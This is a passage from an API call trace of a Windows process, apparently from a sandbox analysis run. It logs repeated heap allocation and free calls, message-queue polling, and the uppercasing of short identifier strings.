Flags=0x0, Size=0x10) returned 0x2aab440 [0221.855] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d98 [0221.855] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78070 [0221.855] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab920 [0221.855] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bc8 [0221.855] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab920 | out: hHeap=0x2af0000) returned 1 [0221.855] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782f0 [0221.855] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab968 [0221.855] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9e0 [0221.855] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78458 | out: hHeap=0x2af0000) returned 1 [0221.855] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c98 | out: hHeap=0x2af0000) returned 1 [0221.855] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0221.855] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0221.855] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0221.855] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c98 [0221.855] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0221.855] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78408 [0221.855] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0221.855] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8f0 [0221.855] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ea8 [0221.855] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781d8 [0221.855] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab890 [0221.855] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71e88 [0221.855] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab890 | out: hHeap=0x2af0000) returned 1 [0221.855] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780c0 [0221.855] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab818 [0221.856] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab998 [0221.856] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78408 | out: hHeap=0x2af0000) returned 1 [0221.856] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c98 | out: hHeap=0x2af0000) returned 1 [0221.856] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0221.856] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0221.856] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0221.856] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c98 [0221.856] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0221.856] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78200 [0221.856] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0221.856] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaba10 [0221.856] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71de8 [0221.856] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78318 [0221.856] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8c0 [0221.856] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71eb8 [0221.856] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8c0 | out: hHeap=0x2af0000) returned 1 [0221.856] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fd0 [0221.856] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7d0 [0221.856] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7e8 [0221.856] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78200 | out: hHeap=0x2af0000) returned 1 [0221.856] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c98 | out: hHeap=0x2af0000) returned 1 [0221.856] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0221.856] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0221.856] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0221.856] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c98 [0221.856] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0221.857] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78098 [0221.857] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0221.857] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab878 [0221.857] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ec8 [0221.857] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78408 [0221.857] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8a8 [0221.857] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71f88 [0221.857] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8a8 | out: hHeap=0x2af0000) returned 1 [0221.857] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781b0 [0221.857] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab800 [0221.857] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab980 [0221.857] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78098 | out: hHeap=0x2af0000) returned 1 [0221.857] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c98 | out: hHeap=0x2af0000) returned 1 [0221.857] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0221.857] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0221.857] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78250 [0221.857] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c98 [0221.857] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0221.857] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78250 | out: hHeap=0x2af0000) returned 1 [0221.857] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c98 | out: hHeap=0x2af0000) returned 1 [0221.857] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab578 [0221.857] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0221.857] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0221.857] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c98 [0221.857] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71db8 [0221.857] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab830 [0221.857] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9b0 [0221.858] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71fe8 [0221.858] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab908 [0221.858] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71fe8 | out: hHeap=0x2af0000) returned 1 [0221.858] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71fe8 [0221.858] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78160 [0221.858] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0221.858] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78160 | out: hHeap=0x2af0000) returned 1 [0221.858] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71fe8 | out: hHeap=0x2af0000) returned 1 [0221.858] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab908 | out: hHeap=0x2af0000) returned 1 [0221.858] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9b0 | out: hHeap=0x2af0000) returned 1 [0221.858] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab830 | out: hHeap=0x2af0000) returned 1 [0221.858] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0221.858] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c98 | out: hHeap=0x2af0000) returned 1 [0221.858] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e980 [0221.858] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0221.858] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e980 | out: hHeap=0x2af0000) returned 1 [0221.858] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0221.858] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c98 [0221.858] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78098 [0221.858] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71db8 [0221.858] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0221.858] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78098 | out: hHeap=0x2af0000) returned 1 [0221.858] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0221.858] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab908 [0221.858] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a73c50 [0221.859] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0221.859] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71db8 [0221.859] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71fe8 [0221.859] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9b0 [0221.859] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab830 [0221.859] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72028 [0221.859] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab848 [0221.859] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72028 | out: hHeap=0x2af0000) returned 1 [0221.859] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a720d8 [0221.859] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78098 [0221.859] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0221.859] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78098 | out: hHeap=0x2af0000) returned 1 [0221.859] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720d8 | out: hHeap=0x2af0000) returned 1 [0221.859] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab848 | out: hHeap=0x2af0000) returned 1 [0221.859] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab830 | out: hHeap=0x2af0000) returned 1 [0221.859] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9b0 | out: hHeap=0x2af0000) returned 1 [0221.859] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71fe8 | out: hHeap=0x2af0000) returned 1 [0221.859] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0221.859] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e9c0 [0221.859] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0221.859] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e9c0 | out: hHeap=0x2af0000) returned 1 [0221.859] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0221.859] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71db8 [0221.859] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a720d8 [0221.859] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab830 [0221.860] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab860 [0221.860] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71fe8 [0221.860] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9c8 [0221.860] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71fe8 | out: hHeap=0x2af0000) returned 1 [0221.860] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9c8 | out: hHeap=0x2af0000) returned 1 [0221.860] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab860 | out: hHeap=0x2af0000) returned 1 [0221.860] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab830 | out: hHeap=0x2af0000) returned 1 [0221.860] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720d8 | out: hHeap=0x2af0000) returned 1 [0221.860] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0221.860] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73c50 | out: hHeap=0x2af0000) returned 1 [0221.860] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab908 | out: hHeap=0x2af0000) returned 1 [0221.860] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71db8 [0221.860] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7220 [0221.860] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9b0 [0221.860] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab830 [0221.860] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71fe8 [0221.860] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab788 [0221.860] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71fe8 | out: hHeap=0x2af0000) returned 1 [0221.860] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab788 | out: hHeap=0x2af0000) returned 1 [0221.860] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab830 | out: hHeap=0x2af0000) returned 1 [0221.860] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9b0 | out: hHeap=0x2af0000) returned 1 [0221.860] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7220 | out: hHeap=0x2af0000) returned 1 [0221.860] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0221.860] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c98 | out: hHeap=0x2af0000) returned 1 [0221.861] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed00 [0221.861] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0221.861] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed00 | out: hHeap=0x2af0000) returned 1 [0221.861] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0221.861] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78098 [0221.861] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c98 [0221.861] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0221.861] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78098 | out: hHeap=0x2af0000) returned 1 [0221.861] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c98 | out: hHeap=0x2af0000) returned 1 [0221.861] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab9b0 [0221.861] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a73f68 [0221.861] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0221.861] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c98 [0221.861] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71db8 [0221.861] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9c8 [0221.861] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7a0 [0221.861] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a720d8 [0221.861] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab758 [0221.861] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720d8 | out: hHeap=0x2af0000) returned 1 [0221.861] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71fe8 [0221.861] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78200 [0221.861] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0221.861] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78200 | out: hHeap=0x2af0000) returned 1 [0221.861] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71fe8 | out: hHeap=0x2af0000) returned 1 [0221.861] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab758 | out: hHeap=0x2af0000) returned 1 [0221.862] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7a0 | out: hHeap=0x2af0000) returned 1 [0221.862] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9c8 | out: hHeap=0x2af0000) returned 1 [0221.862] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0221.862] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c98 | out: hHeap=0x2af0000) returned 1 [0221.862] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e800 [0221.862] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0221.862] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e800 | out: hHeap=0x2af0000) returned 1 [0221.862] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0221.862] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c98 [0221.862] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab920 [0221.862] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab890 [0221.862] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71db8 [0221.862] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8a8 [0221.862] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0221.862] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8a8 | out: hHeap=0x2af0000) returned 1 [0221.862] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab890 | out: hHeap=0x2af0000) returned 1 [0221.862] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab920 | out: hHeap=0x2af0000) returned 1 [0221.862] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c98 | out: hHeap=0x2af0000) returned 1 [0221.862] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c98 [0221.862] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab770 [0221.862] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9f8 [0221.862] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71db8 [0221.862] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab890 [0221.862] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0221.867] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab890 | out: hHeap=0x2af0000) returned 1 [0221.867] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9f8 | out: hHeap=0x2af0000) returned 1 [0221.867] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab770 | out: hHeap=0x2af0000) returned 1 [0221.867] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c98 | out: hHeap=0x2af0000) returned 1 [0221.867] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0221.867] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73f68 | out: hHeap=0x2af0000) returned 1 [0221.867] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9b0 | out: hHeap=0x2af0000) returned 1 [0221.867] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0221.867] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c98 [0221.867] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c98 | out: hHeap=0x2af0000) returned 1 [0221.867] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0221.867] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0221.867] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0221.867] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e800 [0221.867] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0221.867] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c98 [0221.867] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71db8 [0221.867] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7080 [0221.867] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7080 | out: hHeap=0x2af0000) returned 1 [0221.867] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0221.867] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c98 | out: hHeap=0x2af0000) returned 1 [0221.868] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e6c0 [0221.868] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0221.868] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e6c0 | out: hHeap=0x2af0000) returned 1 [0221.868] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0221.868] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c98 [0221.868] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, 